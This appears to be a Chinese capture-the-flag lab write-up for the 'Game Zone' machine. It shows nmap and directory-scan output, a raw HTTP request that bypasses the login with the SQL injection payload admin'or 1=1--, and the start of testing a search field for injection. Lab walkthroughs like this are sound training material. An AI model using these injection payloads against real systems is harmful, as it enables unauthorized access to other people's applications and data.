渗透靶场

发布日期: 2024-08-17

更新日期: 2025-01-23

文章字数: 1.2k

阅读时长: 5 分

阅读次数:

靶机信息	Game Zone
系统	linux
信息	前台登陆处sql注入可以直接拿到shell，之后进入隐藏服务可以拿到对应版本的webmin进行提权

0x00信息收集

0x01 端口扫描


Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:9D:BB:F6:4E:39 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.35 seconds
root@ip-10-10-109-100:~


### 详细扫描80 22


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
MAC Address: 02:9D:BB:F6:4E:39 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (99%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Android 5.0 - 5.1 (92%), Android 5.1 (92%), Linux 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.40 ms ip-10-10-101-77.eu-west-1.compute.internal (10.10.101.77)

*总结一波

操作系统	Ubuntu 4ubuntu2.7
ssh22	OpenSSH的版本为7.2p2
80 服务器	Apache/2.4.18
语言	php
cookie	httponly flag not set

0x02 深入端口

***总觉得端口太少了继续扫 nmap全端口扫描

kscan 爆破一下 –hydra 自动化爆破

kscan	kscan

***没收获直接走掉

0x03 web资产收集

**有预感还是要鹿web
利用工具打一圈

0x031 目录扫描

[21:11:33] 403 -  298B  - /.ht_wsr.txt                                      
[21:11:33] 403 -  301B  - /.htaccess.bak1                                   
[21:11:33] 403 -  301B  - /.htaccess.save                                   
[21:11:33] 403 -  303B  - /.htaccess.sample
[21:11:33] 403 -  301B  - /.htaccess.orig
[21:11:33] 403 -  302B  - /.htaccess_extra                                  
[21:11:33] 403 -  299B  - /.htaccessBAK
[21:11:33] 403 -  299B  - /.htaccess_sc
[21:11:33] 403 -  301B  - /.htaccess_orig
[21:11:33] 403 -  299B  - /.htaccessOLD
[21:11:33] 403 -  300B  - /.htaccessOLD2
[21:11:33] 403 -  291B  - /.htm                                             
[21:11:33] 403 -  292B  - /.html
[21:11:33] 403 -  301B  - /.htpasswd_test                                   
[21:11:33] 403 -  298B  - /.httr-oauth                                      
[21:11:33] 403 -  297B  - /.htpasswds                                       
[21:11:37] 403 -  291B  - /.php                                             
[21:11:37] 403 -  292B  - /.php3                                            
[21:12:43] 301 -  313B  - /images  ->  http://10.10.101.77/images/          
[21:12:43] 200 -  868B  - /images/                                          
[21:13:23] 403 -  301B  - /server-status/                                   
[21:13:23] 403 -  300B  - /server-status

很奇怪都没有权限

0x10 web_exp

只有一个登陆框有功能点因此我们测试 sql 万能密码

sql万能密码	万能密码

POST /index.php HTTP/1.1
Host: 10.10.12.101
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.12.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.12.101/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=o3940qfoad5k0trucelricpo82
Connection: close

username=admin'or 1=1-- &password=&x=33&y=14

跳转到一个页面主要是经营搜索的这个功能点很可能就有一些搜索的%匹配

H2 （3）搜索型注入点

开始测试 searchitem=2ad123’ 因为这个东西感觉只能是字符的注入
因此开始测试 ‘ 发现报错

1 2	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1